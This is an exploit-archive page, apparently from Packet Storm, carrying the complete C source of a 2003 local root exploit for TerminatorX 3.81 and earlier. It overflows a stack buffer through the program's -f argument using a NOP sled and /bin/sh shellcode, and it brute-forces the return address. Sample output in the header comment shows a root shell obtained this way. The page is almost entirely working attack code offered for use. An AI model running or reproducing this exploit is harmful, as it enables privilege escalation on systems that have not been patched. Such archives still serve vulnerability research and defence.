exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

terminatorX-exp.c

terminatorX-exp.c
Posted Nov 14, 2003
Authored by Li0n7

TerminatorX version 3.81 and below local root exploit. Bruteforcing option included. Makes use of vulnerabilities discussed in this related advisory.

tags | exploit, local, root, vulnerability
SHA-256 | d2ae0f1ca62a0e762c3a10af9db9cf6b2ec2a061ba6c99cecdfaeadde1df7ea5

terminatorX-exp.c

Change Mirror Download
/* TerminatorX V. <= 3.81 local root exploit by Li0n7
*
* Typical local stack-based overflow
*
* Bugs discovered by c0wboy (c0wboy@tiscali.it) from 0x333 (www.0x333.org)
*
* Related advisory: https://www.packetstormsecurity.nl/0311-advisories/outsiders-terminatorX-001.txt
*
* Visit us: www.ioc.fr.st
*
* Contact me Li0n7[at]voila[dot]fr
*
* Usage: ./terminatorX-exp [-r <RET>][-b [-s <STARTING_RET>]]
*
* -r <RET>: no bruteforcing, try to execute shellcode with <RET> as return address
* -b: enables bruteforcing
* -s: bruteforces by using return address from <STARTING_RET> to 0x00000000
*
* Example:
*
*root@li0n7:/tmp/test/exploits# ./terminatorX-exp -b
*
* exploit: terminatorX V. <= 3.81 local root exploit by Li0n7
* discoverer: c0wb0y (www.0x333.org)
* visit us: https://www.ioc.fr.st
* contact me: Li0n7[at]voila[dot]fr
* usage: ./xterminator2 [-r <RET>][-b [-s <STARTING_RET>]]
*
*[+] Starting bruteforcing...
*[+] Testing 0xbffff734...
*terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander König
*terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license.
*...
*[+] Testing 0xbffff66c...
*terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander König
*terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license.
*...
*tX: err: Error parsing terminatorXrc.
*tX: Failed loading terminatorXrc - trying to load old binary rc.
*+ tX_warning: LADSPA_PATH not set. Trying /usr/lib/ladspa:/usr/local/lib/ladspa
** tX_error: tX: Error: couldn't access directory "/usr/lib/ladspa".
*+ tX_warning: Plugin "Sine Oscillator (Freq:audio, Amp:audio)" disabled. Not a 1-in/1-out plugin.
*+ tX_warning: Plugin "Sine Oscillator (Freq:control, Amp:control)" disabled. Not a 1-in/1-out plugin.
*+ tX_warning: Plugin "Stereo Amplifier" disabled. Not a 1-in/1-out plugin.
*+ tX_warning: Plugin "White Noise Source" disabled. Not a 1-in/1-out plugin.
*warning: failed to load external entity "%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%901%C0Ph//shh/bin%89%E3PS%89%E1%99%B0%0B%CD%80l%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BF"
*
*** (terminatorX:3085): WARNING **: Invalid UTF8 string passed to pango_layout_set_text()
*sh-2.05b# exit
*exit
*[+] Exited: shell's ret code = 0
*[+] Ret address found: 0xbffff66c
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <errno.h>

#define BSIZE 200
#define D_START 0xbffff734
#define PATH "/usr/local/bin/terminatorX"
#define RET 0xbffff69e

char shellcode[]=
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

char *buffer,*ptr;

void
checkme(char *buffer)
{
if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory,exiting...\n");
exit(0);
}
return;
}


void
exec_vuln()
{
execl(PATH,PATH,"-f",buffer,NULL);
}


int
tease()
{
pid_t pid;
pid_t wpid;
int status;

pid = fork();

if ( pid == -1 ) {
fprintf(stderr, " [-] %s: Failed to fork()\n", strerror(errno));
exit(13);

} else if ( pid == 0 ) {

exec_vuln();

} else {

wpid = wait(&status);
if ( wpid == -1 ) {

fprintf(stderr,"[-] %s: wait()\n", strerror(errno));
return 1;

} else if ( wpid != pid )

abort();

else {

if ( WIFEXITED(status) ) {

printf("[+] Exited: shell's ret code = %d\n", WEXITSTATUS(status));
return WEXITSTATUS(status);

} else if ( WIFSIGNALED(status) ) {

return WTERMSIG(status);
} else {

fprintf(stderr, "[-] Stopped.\n");

}
}
}
return 1;
}


int
make_string(long ret_addr)
{
int i;
long ret,addr,*addr_ptr;

buffer = (char *)malloc(512);
if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory, exiting...\n");
exit(-1);
}

ret = ret_addr;

ptr = buffer;

memset(ptr,0x90,BSIZE-strlen(shellcode));
ptr += BSIZE-strlen(shellcode);

for(i=0;i<strlen(shellcode);i++)
*ptr++ = shellcode[i];

addr_ptr = (long *)ptr;
for(i=0;i<20;i++)
*(addr_ptr++) = ret;
ptr = (char *)addr_ptr;
*ptr = 0;
return 0;
}


int
bruteforce(long start)
{
int ret;
long i;

fprintf(stdout,"[+] Starting bruteforcing...\n");

for(i=start;i<0;i=i-50)
{
fprintf(stdout,"[+] Testing 0x%x...\n",i);
make_string(i);
ret=tease();
if(ret==0)
{
fprintf(stdout,"[+] Ret address found: 0x%x\n",i);
break;
}
}

return 0;
}

void
banner(char *argv0)
{
fprintf(stderr,"\n exploit: terminatorX V. <= 3.81 local root exploit by Li0n7\n");
fprintf(stderr," discoverer: c0wb0y (www.0x333.org)\n");
fprintf(stderr," visit us: https://www.ioc.fr.st\n");
fprintf(stderr," contact me: Li0n7[at]voila[dot]fr\n");
fprintf(stderr," usage: %s [-r <RET>][-b [-s <STARTING_RET>]]\n\n",argv0);
}

int
main(int argc,char *argv[])
{
char * option_list = "br:s:";
int option,brute = 0, opterr = 0;
long ret,start = D_START;

banner(argv[0]);
if (argc < 1) exit(-1);

while((option = getopt(argc,argv,option_list)) != -1)
switch(option)
{
case 'b':
brute = 1;
break;
case 'r':
ret = strtoul(optarg,NULL,0);
make_string(ret);
tease();
exit(0);
break;
case 's':
start = strtoul(optarg,NULL,0);
break;
case '?':
fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
banner(argv[0]);
exit(-1);
}

if(brute)
bruteforce(start);

return 0;
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close